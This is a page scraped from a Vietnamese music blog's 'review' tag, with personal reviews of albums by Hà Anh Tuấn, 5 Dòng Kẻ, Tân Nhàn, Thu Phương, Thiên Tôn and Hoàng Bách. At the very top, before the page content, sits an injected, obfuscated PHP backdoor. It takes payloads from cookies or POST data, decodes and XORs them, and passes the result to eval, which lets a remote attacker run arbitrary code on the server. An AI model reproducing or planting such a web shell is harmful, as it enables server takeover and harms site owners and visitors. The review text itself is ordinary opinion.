$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> review – Page 2 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: review (page 2 of 4)

Hà Anh Tuấn – Chuyện của mùa đông

Nghĩ cũng khá buồn cười, H.A.Tuấn đoạt Giải Triển Vọng của Sao Mai Điểm Hẹn cách đây cũng phải 8 năm rồi (2006), nhưng mà mình vẫn cứ suy nghĩ Tuấn vẫn là ‘ca sĩ trẻ’. Lê Hồng Phong gần đây có 2 ca sĩ trẻ tên Tuấn khá thành công: Đức Tuấn và H.A.Tuấn, trong suy nghĩ của mình, mình luôn đánh giá Đức Tuấn cao hơn, nhất là nhân dịp có lần về trường nghe Đức Tuấn hát mộc bài ‘Một lần đón đưa’. Còn H.A.Tuấn, nhắc lại, trong ấn tượng của mình vẫn chỉ là ‘ca sĩ trẻ’.

Á thế mầy, H.A.Tuấn lại làm mình vô cùng sững sờ và kinh ngạc khi xem anh diễn live tại ‘Ru mùa đông’ do Quốc Trung tổ chức ở Nhà hát lớn Hà Nội tháng rồi. Show chỉ có 3 ca sĩ: Hồng Nhung, Uyên Linh và Hà Anh Tuấn. Vốn dĩ ai cũng nghĩ 2 cô ca sĩ nữ ấy sẽ là điểm chính của chương trình, vậy mà theo mình, Hà Anh Tuấn lại là điểm sáng nhất của cả đêm diễn. Không như Uyên Linh hát khô khan và vô cảm xúc, Hồng Nhung quá điệu đà như con công sặc sỡ, khoe giọng ở những chỗ không cần thiết (nghĩa là ở hầu như 100% bài hát), thì Tuấn đêm đó bùng cháy, từ một đốm lửa nhỏ, trở nên rực rỡ trong đêm mùa đông lạnh giá ấy.

Khi Tuấn hát bài Mẹ Tôi của Trần Tiến, cả khán phòng sững sờ, Tuấn hát hay hơn cả Trần Thu Hà, hát hay hơn cả Đồng Lan. Ai muốn nghe thử có thể nghe ở đây

Sau đêm đó, mình bắt đầu nghiêm túc tìm nghe lại những album trước đây của Tuấn, và đã có lần mình nói, Hà Anh Tuấn thật sự bị underrated (bị đánh giá thấp) so với khả năng của anh.

Đầu tuần, lướt vu vơ trên mạng, thấy Tuấn ra single mới ‘Chuyện của mùa đông’ gồm 4 bài. Thường thì mình không hay viết về single, vì theo mình 4 bài là quá ít để nắm được cái hồn của album, cái tâm tình của người hát. Nhưng hãy xem đây là trường hợp khá đặc biệt, vì chủ yếu là mình muốn nói đến cảm nhận hiện tại của mình về Tuấn, sau thứ yếu mới là single mới của anh.

Tuấn bị cái là lưỡi hơi ngắn, dĩ nhiên mình không banh họng anh ra mà dòm vào, nhưng điều này có thể nhận ra khi nghe anh hát hay trả lời phỏng vấn. Vì thế khi nghe Tuấn hát, tinh ý có thể phát hiện nhiều chỗ anh bị ngọng. Và điều này có lẽ rất khó sửa. Single này cũng thế. Vì vậy mà nhiều người chắc sẽ không thích nghe Tuấn hát.

Tuy nhiên, nếu bỏ qua được vài chỗ ‘trúc trắc’ ấy, thì single này vẫn được. Được nghĩa là không phải quá xuất sắc, không có bài nào đủ tạo thành hit thật sự, nhưng 4 bài đều tròn trịa. Từ sáng tác nhẹ nhàng tên chủ đề của album ‘Chuyện của mùa đông’, đến bài hát tưởng như đã cũ ‘Để dành’ (Nguyễn Xinh Xô) hay bài ‘Tôi đang sống’ của VÕ Thiện Thanh, đến ‘Niềm tin’ – ca khúc mà Tuấn gửi gắm cho thế hệ giống như anh.

Mình đánh giá khá cao single này, phần vì chủ kiến cá nhân, phần vì đây là single đẹp và chỉn chu, tinh tế mà đầy trăn trở của một người trẻ hiện đại. Lại nói về chủ kiến cá nhân, nghe để thấy cái khát khao được hát của một người có những khiếm khuyết nhất định về giọng hát…

5 Dòng Kẻ – Yêu

Chắc phải lâu rồi mới có album Việt khiến tôi nghe xong ngồi thẫn thờ đến đẫn đờ một lúc như album ‘Yêu’ này của 5 Dòng Kẻ. Và đây cũng là album mà dù nghe xong đến lần này lần thứ 4, tôi cũng ngần ngại không dám đặt bàn phím vào viết bình luận, vì vốn hiểu biết và kiến thức của tôi còn hạn chế quá. Đêm qua mệt mỏi chắc vẫn còn do jetlag, ngủ một mạch từ 8 giờ tối, tới 6 giờ sáng thì bật dậy, trong không gian yên tĩnh của buổi sớm mai, tôi làm chè trôi nước ăn và quyết định nghe lần nữa và viết gì đó. Vì có lẽ không viết thì cảm thấy áy náy lắm.

—-

Khái niệm World Music tuy đã có từ khá lâu, nhưng đến giờ vẫn còn gây kha khá tranh luận, và vẫn thuộc loại mới mẻ trên thế giới, chứ chưa nói gì đến Việt Nam. Thật ra, đừng tin khi lâu lâu có một ông hay bà nào đó bảo là âm nhạc Việt Nam chậm tiến tầm vài chục năm so với thế giới. Những năm gần đây, tôi thấy các nghệ sĩ bên ta bắt nhịp khá nhanh so với các trào lưu, dù đang thịnh hành hay vẫn còn đang dạng thử nghiệm trên thế giới. Mà thôi, lại quay về thể loại World Music.

World Music tuy không rầm rộ, nhưng cũng đã được vài nghệ sĩ ở Việt Nam tìm tòi và theo đuổi. Về nhạc sĩ, nhà sản xuất thì đó là Quốc Trung, với hàng loạt dự án thử nghiệm sau-Đường xa vạn dặm của anh; về ca sĩ, nhóm nhạc thì nổi lên nhất là Tùng Dương và 5 Dòng Kẻ. World Music như đã nói về khái niệm đến giờ cũng chưa hoàn toàn thống nhất, nhưng có thể tạm hiểu là cách kết hợp những đặc trưng trong nền âm nhạc của một sắc tộc, dân tộc, khu vực nào đó với loại âm nhạc hiện đại trên toàn cầu. Nói dân dã như quê ta hay nói thì là: kết hợp âm nhạc truyền thống và đương đại.

—-

Sau thất vọng (cá nhân) với ‘Chuyện của mặt trời, Chuyện của chúng ta’ của Đỗ Bảo – Hà Trần, thì tôi rất trông chờ vào tầm vài tháng cuối năm, để nghe thử ‘Độc đạo’ của Tùng Dương (kết hợp cùng nghệ sĩ jazz Pháp gốc Việt Nguyên Lê) và ‘Yêu’ của 5 Dòng Kẻ. Có một điều thú vị là vào năm 2007, Tùng Dương và 5 Dòng Kẻ đều tung ra những album rất đỉnh: ‘Cánh mặt trời’ và ‘Những ô khối màu lập phương’. Cả 2 album đã có cuộc rượt đuổi ngoạn mục ở giải Cống Hiến và cuối cùng thì album của Tùng Dương vượt lên trên 5 Dòng Kẻ chỉ với vài phiếu.

Năm nay, lần lượt Tùng Dương và 5 Dòng Kẻ đều tung ra album vào một thời điểm, cùng theo đuổi World Music. Trong khi album Tùng Dương được chính anh bay sang tận Pháp để thu âm, thì ‘Yêu’ của 5 Dòng Kẻ cũng được hoà âm bởi các nhạc sĩ uy tín trong nước, và được master tại Mỹ. Tùng Dương ngày càng trưởng thành, giờ bảo anh là nam ca sĩ người Việt xuất sắc nhất, ắt cũng có thể. Với 5 Dòng Kẻ, thì đó là dấu hỏi lớn.

Đã 6 năm rồi, các cô gái của 5 Dòng Kẻ mới tung ra album mới, dù trong khoảng thời gian xen kẽ đó, họ cũng đã xuất hiện nhiều lần trên các chương trình ca nhạc, nhưng thính giả (trong đó có cả tôi) vẫn khá hồ nghi, không biết 5 Dòng Kẻ sẽ ra sao sau sự ra đi của Hồng Ngọc. Lần Hồng Ngọc rời nhóm này khác với Giáng Son. Trong khi Giáng Son rất mạnh ở vai trò sáng tác, phần ca hát của cô lại không ấn tượng bằng. Với Hồng Ngọc thì khác. 5 Dòng Kẻ thời ‘Cánh mặt trời’ là sự hoà quyện rất đẹp giữa các giọng ca trong vắt như thiên thần của Bảo Lan, Lan Hương và Thuỳ Linh, đối lập với giọng khàn nhừa nhựa khói của Hồng Ngọc. Nay Hồng Ngọc tách nhóm rồi, liệu ‘Yêu’ của 5 Dòng Kẻ có đơn điệu là một màu chán ngắt?

May mắn là không.

6 năm trước, khi còn trẻ, các cô gái ấy viết lan man khá rộng về đủ thứ, về vạn vật, về con người, về những biến chuyển rất nhỏ của cuộc sống. Giờ đây, khi trưởng thành hơn, họ chỉ viết về ‘Yêu’. Nghe thì có vẻ hơi ngược, nhưng đó lại là điều đáng chờ mong. Toàn bộ bài trong album đều là sáng tác của Bảo Lan, và cô cũng đảm nhiệm phần hoà âm, phối khí. Nói tóm lại, mình cô lo tất tần tật từ A tới Z. Đây là một concept album, các bài được sắp xếp để cùng nhau kể về một câu chuyện: tình yêu của một thiếu nữ, từ lúc mới ngỡ ngàng chạm vào yêu, đến khi thăng hoa tưởng chừng đến cùng cực khi thiếu nữ được yêu trọn giấc mơ, và cuối cùng là những hoang mang, nuối tiếc, những nỗi buồn khi tình yêu tan vỡ. Tuy về lí thuyết chỉ là những sáng tác riêng của Bảo Lan, tưởng rằng câu chuyện chỉ viết cho cô, để mình cô hiểu, nhưng nghe kĩ lại thì mới thấy, đây chẳng phải là tâm trạng chung của biết bao cô gái trên thế giới này, khi yêu đấy sao?

Tôi xin không đi kĩ vào phân tích từng bài hát, như bài này thế nào, lời hay ra sao, nhạc xuất sắc đến mấy… vì phần đó, mỗi người tự nghe và có trải nghiệm của riêng mình sẽ hay hơn. Tôi chỉ xin nói về chất nhạc, thứ khiến tôi rất ngạc nhiên.

Album không phải đơn sắc, mà là sự hoà quyện của rất nhiều gam màu nhạc khác nhau, từ nhẹ nhàng và sâu lắng, có khi tưởng như biến mất hoàn toàn để tiếng thổn thức của tâm hồn người thiếu nữ vang lên, có khi lại dữ dội, ồn ào và mạnh mẽ, như Bảo Lan chỉ mượn tiếng nhạc để nói hộ lòng cô thôi cũng là đã đủ. Nghe album này thú vị lắm, có khi tôi nghe lại cảm giác phần nhạc lấn áp phần lời, có khi thì thấy phần lời và phần nhạc chẳng hoà vào nhau gì cả, có lần nghe lại thì thấy cho dù có là cái sự chẳng-hoà-quyện ấy, vẫn có gì hay trong đấy.

Tôi vẫn khá phân vân khi nghĩ xem album này và album trước của 5 Dòng Kẻ, cái nào hay hơn. Về chất nhạc thì tôi thấy thích ‘Yêu’ hơn, nhưng khó mà có thể phủ nhận, sự ra đi của Hồng Ngọc đã để lại khoảng trống nào đó ảnh hưởng không hề nhỏ tới nhóm. Có những bài mà tôi thấy, dường như không có Hồng Ngọc cũng chả sao, giọng 3 nàng thiếu nữ ấy hoà vào nhau, nâng đỡ nhau là đủ; nhưng cũng có không ít bài, chỉ cảm thấy tiếc nuối, như món ăn mình biết thêm vào tí gia vị nào đó là sẽ ngon hơn, ấy thế mà lại không có…

Dĩ nhiên, như đã nói ở đầu bài, tôi vẫn đánh giá album này là một trong những album thành công nhất trong năm 2013. Và giờ đây, sự trông chờ của tôi chỉ còn là ‘Độc đạo’ của Tùng Dương….

Tân Nhàn – Yếm đào xuống phố

Trời ạ, đúng ra mà nói mình không có ý định nghe album này đâu. Qua đến giờ nghe đi nghe lại album mới nhất thể loại World Music của 5 Dòng Kẻ xoay xoay đến mụ cả đầu, mới quyết định chuyển sang nghe một mạch, từ Trịnh Lam, Quốc Thiên đến Trần Thái Hòa (đều là 3 album mà mình muốn viết, mà để sau)… ai ngờ cuối cùng Media Player nhảy tới album này của Tân Nhàn – album mình để xó đó lâu rồi mà chưa có hứng nghe, vì cảm giác nghe chắc không hợp và nghe ắt sẽ nhức đầu. Cơ mà không ngờ nghe được rồi, nghe tới luôn, lại thấy thích.

Cảm giác của mình khi nghe xong album này là Tân Nhàn khủng vãi. Tân Nhàn đoạt giải nhất mục nhạc Dân Gian ở cuộc thi Sao Mai 2005 với ca khúc ‘Trăng Khuyết’. Tuy nhiên, phải vài năm sau đó, khi em gái Hà Nội tuy không bé bỏng nhưng rất xinh xắn rủ mình log acc vào game, cùng nhau cưỡi ngựa đi dạo ngắm trăng ở Hoa Sơn Tuyệt Cảnh, và e ấp dịu dàng dưới vầng trăng ấy nói lời chia tay mình, mình buồn lang thang nghe nhạc, nghe được bài ‘Trăng Khuyết’ do Tân Nhàn hát mà thấy buồn gì đâu:

Sao anh lại ngỏ lời
Vào một đêm trăng khuyết
Để bây giờ thầm tiếc
Một vầng trăng không tròn

Từ đó mình mới chú ý tới Tân Nhàn.

Mà cũng bảo thế thôi, sau này Tân Nhàn có ra vài album khác, mình cũng chỉ tặc lưỡi rồi lướt qua, vì không hứng thú nhiều, nhưng ‘Yếm Đào Xuống Phố’ này thì ngay từ khi album được tung ra, mình đã muốn nghe, vì đọc qua về nó thấy hấp dẫn gì đâu.

‘Yếm đào xuống phố’ là sự kết hợp giữa chèo, xẩm – những thể loại nhạc dân gian đến từ Bắc Bộ, và jazz – thứ nhạc tự sự đặc sệt chất Tây Phương, do nhạc sĩ Trần Mạnh Hùng hòa âm phối khí. Mình không biết có chính xác không, nhưng có lần Lê Minh Sơn đã nói đẳng cấp phối khí cổ điển của Trần Mạnh Hùng đã được thế giới công nhận. Đúng hay sai thì không biết, nhưng khi nghe album ‘Ru Mãi Ngàn Năm’ của Thanh Lam do anh phối khí, cái chất bán cổ điển trong đó nghe hay, và lạ lắm, lạ hơn hẳn so với kể cả Thanh Lam trước đây. Ngoài ra, nếu ai còn nhớ, thì việc kết hợp giữa một thể loại nhạc đậm chất làng quê Bắc Bộ và jazz cũng không phải là lần đầu tiên anh thực hiện. Một trong những bài mình chú ý trong ‘Bên bờ ao nhà mình’, album đầu tay của Thị Mầu Ngọc Khuê năm nào, thì Trần Mạnh Hùng cũng ‘trộn’ quan họ và jazz hết sức nhuần nhuyễn, tạo nên màu sắc riêng biệt ởca khúc ‘Ngồi tựa mạn thuyền’.

Với một thằng sinh ra và lớn lên trong miền Nam như mình thì chèo xẩm là thứ gì đó rất khó nhằn. Ban đầu mình cũng hơi thắc mắc là liệu một giọng ca sau Sao Mai đi về hướng thính phòng cổ điển với chất giọng trong và cao lảnh như Tân Nhàn, sẽ thể hiện các bài nhạc có âm hưởng chèo và xẩm, vốn rất buồn như thế nào. Trong album này, nghe nói Trần Mạnh Hùng cũng mạnh dạn thay toàn bộ các nhạc cụ trong chèo, xẩm truyền thống như đàn tranh, nhị, sáo… bằng các nhạc cụ Tây Phương.

Mình nghe qua thì rất ngạc nhiên, album ‘Yếm đào xuống phố’ này qua giọng hát của Tân Nhàn và sự phối khí của Trần Mạnh Hùng, nghe vẫn giữ được âm hưởng của chèo và xẩm, vẫn í a luyến láy, nhưng dễ nghe, không còn cái buồn đến ảo não thường thấy, mà thay vào cái đó là sự trong trẻo và hiện đại.

Mình không nghe chèo, xẩm nhiều, bảo là cách hát và phối trong album này hay hơn chèo, xẩm truyền thống thì mình không dám nói, nhưng mình là mình thích hơn.

Thử lấy bài chắc là được nhiều người biết nhất trong thể loại này: ‘Đào Liễu’ làm ví dụ. ‘Đào Liễu’ thuộc loại kinh điển trong thể loại chèo dân gian. Có thể nói hầu như không vở nào không chen vào một ít giai điệu của ‘Đào Liễu’. Nếu ai có theo sát thể loại World Music từ những bước đầu ở Việt Nam, thì ắt biết trong chương trình âm nhạc ‘Đường xa vạn dặm’ rất thành công của mình vào tầm vài năm trước, Quốc Trung có phối lại ‘Đào Liễu’. Ca khúc được thực hiện rất thành công qua sự thể hiện của Lê Xuân Diệu – trưởng đội nhạc đoàn II, Nhà hát Chèo Trung ương. Buổi đó, Xuân Diệu kéo nhị và hát ‘Đào Liễu’ với chất giọng ‘xẩm’ (bài này như Xuân Diệu nói: chỉ hợp với những giọng nam mượt mà) đã dường như làm sống lại không khí và cảm xúc của một miền quê Bắc Bộ thời xa xưa. Quốc Trung cũng từng bảo: hát Đào Liễu thì không ai chuẩn bằng Xuân Diệu.

Nghe ‘Đào Liễu’ do Tân Nhàn trình bày, không còn thấy cái buồn (trời, nghe tiếng nhị kéo của Xuân Diệu đã thấy buồn rồi) xen lẫn chút gì đó dửng dưng khi một người đàn ông nhìn vào và tiếc thương cho một nàng thiếu nữ, mà đó như là người thiếu nữ kể về câu chuyện của mình: xinh xắn, dịu dàng nhưng cũng chỉ có lứa có thì mà ‘xuân bất tái lai’, bằng cái giọng trong trẻo và luyến láy duyên.

Hay như bài “Quân tử vu dịch” hát cùng Quốc Phòng, thuật chuyện xưa Lưu Bình và Dương Lễ, đoạn Châu Long nghe lời chồng tới chăm chuyện cơm nước và học hành của Lưu Bình, bản của Tân Nhàn – Quốc Phòng dễ nghe hơn hoàn toàn so với cũng chính Quốc Phòng hát cùng Phương Mây trong một album mới phát hành năm ngoái, dù có thể nói Tân Nhàn thiếu đi phần nào cái vẻ sắc sảo đặc trưng của người con gái Bắc khi xưa.

Điểm đáng tiếc có thế hiểu và thông cảm ở album này là giọng Tân Nhàn không hợp để hát nhiều bài đòi phải có chất quái rất lọc đời, hay độ chua ngoa đanh đá ở một mức nào đó – vốn được xem những điểm khá nổi bật ở thể loại chèo hay xẩm. Như trong bài ‘Mục hạ vô nhân’

Chúng anh đây mục hạ vô nhân
Nghe em nhan sắc lòng xuân anh não nùng.
Dù em má phấn chỉ hồng
Dửng dừng dưng anh chẳng thèm trông làm gì.

Giọng Tân Nhàn không làm nổi lên được cái vẻ dưng dửng, khinh khỉnh nhưng xuyên suốt là rất duyên lém lỉnh đó.

Dĩ nhiên, mình nghĩ Tân Nhàn và cả nhạc sĩ Trần Mạnh Hùng đều biết được điều này khi bắt tay thực hiện album, nhưng để chèo và xẩm đến được với đông đảo người nghe hơn, đặc biệt là giới trẻ, họ phải quyết định đánh đổi điều gì đó, ở đây là những đặc điểm tuy hết sức khó nghe nhưng là đặc trưng riêng biệt của chèo, xẩm. Có rất nhiều cuộc tranh luận xoay quanh vấn đề nên hay không nên, và những người thủ cựu thì cho rằng thà ít người nghe mà vẫn giữ được những đặc trưng ấy, hơn là cách tân thu hút mà thay đổi hoàn toàn. Ở đây, đứng ở cương vị người trẻ nhờ những album như thế này mới có thể nghe và hiểu thêm về các loại hình nghệ thuật dân gian nước ta, mình rất trân trọng động thái và nỗ lực này của các nghệ sĩ. Thật sự mong về sau sẽ có thêm nhiều album nghe hay và lạ thế này nữa 🙂.

Thu Phương – Biển, nỗi nhớ và Em

He he nói về Thu Phương thì có rất nhiều chuyện để nói, nhưng thôi nói ngày xưa trước đi. Cái thời Thu Phương đang nổi ở Việt Nam thì chắc khi đó anh vẫn mặc quần thủng đáy suốt ngày nghe “Còn thương rau đắng mọc sau hè” từ băng cát-xét cũ kĩ của ông già. Nhưng đại loại là ngày xửa ngày xưa, cái thời chưa tay nào rảnh rang đặt và chính thống hoá từ diva-Việt, thì người ta đã coi bốn giọng ca nữ hát nhạc Pop nhẹ hay nhất tầm những năm 90-00 là Thanh Lam, Hồng Nhung, Mỹ Linh và Thu Phương.

Ngày đó Hà Trần chưa là đinh gì, giọng vẫn non choẹt yếu gì đâu, sau Hà được đào tạo bài bản, và Thu Phương đi sai đường thành ra giờ 4 diva-Việt nghiễm nhiên Phương bị gạch tên, thế bằng tên Hà. Well, anh không bàn Hà có xứng đáng không, dù ý kiến cá nhân của anh là rất xứng, chỉ muốn nói giọng Thu Phương hay thì ai cũng phải công nhận. Có thể nói Phương là một trong số ít ca sĩ hát cảm xúc nhất, cảm xúc như chính tâm sự nó bộc lộ thẳng ra từ bài hát, rất chân thành mà không quá phô trương, gắng gượng.

Phương khi qua Mỹ cũng ra album rất đều, và album nào cũng chất lượng. Thu Phương rất lạ, anh có cảm giác bọn Paris By Night làm hỏng Thu Phương, trình diễn trên sân khấu nhiều khi Phương hát như rồ, không hiểu chị rú lên như còi xe cứu hoả làm gì. Điển hình gần đây nhất trong Paris By Night 109 Vip Party, Phương hát như gái bán kẹo kéo hay huất nhạc kích động ở sàn. Nhưng khi Phương ra album, thì (hầu như) luôn luôn chất lượng.

—–

Album mới nhất của Thu Phương được Thuý Nga CD phát hành là “Biển, nỗi nhớ và em”. Thu Phương chọn bài rất khôn, cả 11 bài trong album này, theo anh, đều nằm trong danh sách những ca khúc hay nhất viết về Biển. Lẽ tất dĩ ngẫu trước Thu Phương, có hàng tá ca sĩ khác trình bày rồi, nhưng với giọng của Thu Phương thì ắt không cần phải e sợ cái bóng của bất cứ ai phủ lên ca khúc nào.

Thu Phương hiện tại vẫn như Thu Phương của gần 20 năm trước khi lần đầu làm sôi động thị trường âm nhạc Việt với Unbreak My Heart, giọng của Phương vẫn đầy nội lực và thiết tha. Album này không phải là album hay nhất của Phương, nhưng là một trong những album thể hiện rõ đẳng cấp của chị. Thu Phương từ lâu đã được biết đến với việc nhả chữ rất riêng, nhưng có vẻ dạo này chị hơi lạm dụng kĩ thuật quá, luyến láy cứ loạn hết cả lên. Nhưng bỏ qua vài chỗ nhỏ nhặt đó, thì album này nghe rất được. Được ở chỗ điểm mạnh nhất đó giờ của Thu Phương được thể hiện rõ: truyền cảm. Từ các ca khúc thủ thỉ rù rì như “Bay đi cánh chim biển”, nhẹ nhàng như “Biển, nỗi nhớ và em”, da diết như “Biển nhớ” hay cô đơn như “Nha Trang ngày về”… anh đều cảm nhận được từng luồng sóng xúc cảm như từ ca sĩ truyền thẳng đến người nghe.

Ngay cả ba ca khúc nếu nghe qua là yếu so với toàn bộ album: “Biển tình” bởi bản thân bài hát, “Mưa trên biển vắng” trong anh không qua được cái bóng của Ngọc Lan mặc chiếc đầm nâu, tóc xoăn xoã xuống bờ vai hát năm nào, “Thuyền và biển” – đơn giản giọng Thu Phương và Tuấn béo Hà Anh không hợp nhau, thì anh vẫn thấy được sự truyền cảm đó.

—–

Có thể nhiều bạn nghe album sẽ thấy khá nhàm, theo anh đó là việc nhét quá nhiều ca khúc nổi tiếng vào cùng một album, và đều hay gần gần ở một mức độ như nhau, nên thiếu điểm nhấn nào đó để những người nghe-trong-khi-đang-làm-việc-khác chú ý. Nghe album này nếu muốn thưởng thức trọn vẹn, cứ chụp headphone vào đầu, nhắm mắt lại và thả lỏng để giai điệu vang lên. Thỉnh thoảng sẽ bắt gặp trong cái tiếng thổn thức của cô ca sĩ đấy, là tiếng lòng của mình vọng lại. Như tới câu ‘nghe trời gió lộng mà thương’ trong Biển nhớ, lại thấy thương yêu vô ngần….

Thiên Tôn – Hương Xưa

Những ai theo dõi Thúy Nga Paris By Night dạo gần đây chắc có ấn tượng với anh chàng ca sĩ đầu trọc lóc và cái tên rất oách: Thiên Tôn. Và cũng không khó để nhận ra, với kiểu làm của Thúy Nga hiện tại, có thể nói họ đặt rất nhiều hi vọng vào Thiên Tôn trong việc trở thành một tên tuổi có thể tiếp bước Bằng Kiều, sau khi Trịnh Lam hơi bị chững lại một cách khó hiểu.

Thiên Tôn đoạt giải trong cuộc thi ca hát nào đó của cộng đồng người Việt bên Mỹ, sau đó ‘vào’ Thúy Nga. Thiên Tôn trước khi thành ca sĩ chuyên nghiệp thì đã từng làm việc liên quan đến âm nhạc, anh dạy từ hát tới đàn. Vì vậy, tuy bảo Thiên Tôn là ca sĩ trẻ, nhưng cách anh trình diễn trên sân khấu lại mang dáng dấp của một ca sĩ nhiều kinh nghiệm. Lần đầu tiên nghe Thiên Tôn hát (cũng là lần đầu anh xuất hiện trên Paris By Night), tôi rất ngạc nhiên khi thấy dường như anh biến cả sân khấu trở thành sân nhà, thành khung diễn của anh.

Thúy Nga những năm trở lại đây tạo rất nhiều đất diễn cho lớp ca sĩ trẻ, và rất trẻ. Khi mà thế hệ những người nghệ sĩ già, những chứng nhân âm nhạc ngày cũ của một đấy nước đầy biến động lịch sử đã ngày lại ngày ít xuất hiện dưới ánh đèn sân khấu, sự tồn vinh và hi vọng phát triển của làng nhạc hải ngoại được đặt lên vai những tên tuổi mới toanh ấy. Chúng ta thấy Thúy Nga lăng xê cặp đôi Mai Tiến Dũng – Tóc Tiên ở thể loại nhạc trẻ sôi động, trước đây là Quang lê – Mai Thiên Vân ở nhạc tình quê hương mang âm hưởng dân ca, và những Trịnh Lam, hay gần nhất là Đình Bảo, Thiên Tôn ở thể loại nhạc trữ tình. Và “Hương Xưa” là phép thử đầu tiên của Thiên Tôn.

Thiên Tôn hẳn là rất tự tin khi album đầu tay đã toàn là những bài cực kì khó hát, từ nhạc Vũ Thành An, cho tới Từ Công Phụng, đến Đoàn Chuẩn & Từ Linh, Cung Tiến… Hát mấy bài ‘kinh điển’ thế này, chỉ hát hay một bài đã là khó, nói gì đến việc cả 11 bài trong album.

Lại nói về giọng của Thiên Tôn, giọng của chàng ca sĩ ấy cũng trong và đẹp như đôi mắt của anh. Giọng Thiên Tôn cao và rất đẹp, tuy không cao được như Bằng Kiều nhưng nghe khỏe khoắn và lãng mạn, chứ không như giọng anh Kiều, nhiều lúc lên cao vút nghe rất ẻo lả và gồng mình. Thường dân Việt bên này nghe quen các giọng ca nhạc vàng ủy mị rồi nên vốn ít nghe được những giọng ‘bán cổ điển’, nhưng may là gần đây, xu hướng đó đã thay đổi, vì vậy Thiên Tôn có rất nhiều đất dụng võ.

Quay lại album này, tuy là các ca khúc cũ, nhưng Thiên Tôn không trình bày theo cách các ca sĩ cũ trình bày. Dùng chữ cao sang cho nhạc thì không hợp, thôi dùng từ ‘lịch lãm’ vậy. Các bài trong album này đều được trình bày rất lịch lãm. Tuy vì thế mà bớt đi cái chất đầy tâm sự da diết của nhiều bài hát, nhưng sự lịch lãm, hiện đại đó lại rất phù hợp với người trẻ. Trong album, nhiều bài Thiên Tôn hát cực giống Bằng Kiều, nghe không kĩ là dễ bị nhầm ngay, nhưng nếu để ý thì vẫn có nhiều chất riêng.

Note thêm nữa là Thiên Tôn hát còn có vẻ hào hoa hơn anh Bằng Kiều bóng lộn quá mức….

Hoàng Bách – Trời còn mưa mãi

Vào thời điểm phát triển cực thịnh của các Boy Band ở Việt Nam, vốn rập khuôn theo hình mẫu Tây Phương với hình ảnh bóng mượt, hào nhoáng và các ca khúc dễ nghe, dễ thuộc, thì AC&M xuất hiện (vốn tách ra từ dàn hợp xướng của phòng trà ATB) và thổi làn gió mới vào nền nhạc Việt, với cách hát Acapella lạ lẫm nhưng được giới trẻ yêu thích. AC&M trong trí nhớ của tôi là một boy band rất lịch lãm và hiện đại, một điểm nhấn thú vị mà có lẽ phải lâu nữa mới tìm được một nhóm nào như thế. Vì vậy, khi AC&M tan rã, và các thành viên trong AC&M tung ra album solo, tôi mong đợi rất nhiều.

Hai tên tuổi được nhắc đến nhiều nhất ở AC&M ngày đó: Hoàng Bách và Nam Khánh, thì theo tôi, Nam Khánh vụt lên như một giọng ca cực đẹp. Gần đây, người ta hay nói nhiều đến Tùng Dương, Bằng Kiều hay Trần Thái Hòa, Lê Hiếu hay Đức Tuấn… Dĩ nhiên, mỗi nam ca sĩ sở trường một lĩnh vực khác nhau, nhưng trong số các album của các nam ca sĩ Việt gần đây, rất khó kiếm được album nào đẹp lung linh như ‘Yêu & Mơ’ của Nam Khánh. (Một nam ca sĩ rất có-tiềm-năng, nhưng theo kiểu khác, mà nếu có thời gian sau tôi sẽ nhắc đến – là Hà Anh Tuấn).

Khi trong AC&M, Hoàng Bách hoàn toàn không lép vế so với Nam Khánh, cả về chất giọng lẫn phong cách, thậm chí Hoàng Bách còn có ưu điểm là sáng tác tốt, với hai bài hát thuộc hàng ‘thương hiệu’ AC&M: “Chuyện chàng cô đơn” và “Đêm nay có mưa rơi”. Ấy thế mà sự nghiệp solo của Hoàng Bách, dù được báo chí đánh giá cao (?), với tôi hoàn toàn không có gì ấn tượng, nếu không muốn nói không thể đạt mức chấp nhận được với giọng ca đầy tiềm năng như anh.

“Trời còn mưa mãi” là album được phát hành gần đây (trong khoảng thời gian cuối năm) của Hoàng Bách, chủ đề là các ca khúc nhạc Nhật.

Người Việt mình không nghe nhạc (khá-xưa) Nhật nhiều lắm. Hầu hết những bài nhạc được giới trẻ yêu thích đều là từ nhạc Hoa, hoặc nghe giống nhạc Hoa. Ấn tượng đầu tiên của tôi về nhạc Nhật chắc là bài “Biển trắng” và “Tình thôi xót xa” do Lam Trường trình bày. Nhạc Nhật trong tôi không cổ và da diết như nhạc Hoa, nó đều đều, nhẹ nhàng và khá tinh tế – nhưng vì thế nên hơi khó nghe.

Hoàng Bách giọng nên dành cho các bài nhạc có âm tiết và cách trình bày hiện đại, tinh tế, chứ không hát hợp những bài ảo não và da diết quá đâu. Đó là những cảm giác bật lên đầu tiên trong tôi lâu rồi, khi lần đầu nghe ‘Thoáng mây bay’ – album nằm trong Classic Series hợp tác cùng Music Faces của Đức Trí vài năm trước. Vì vậy, khi tình cờ thấy album ‘Trời còn mưa mãi’ này, tôi nghe trong tâm trạng khá háo hức và mong chờ, vì tôi nghĩ nếu Hoàng Bách hát tinh tế xíu, thì ắt sẽ hợp lắm đây.

Á vậy mầy…

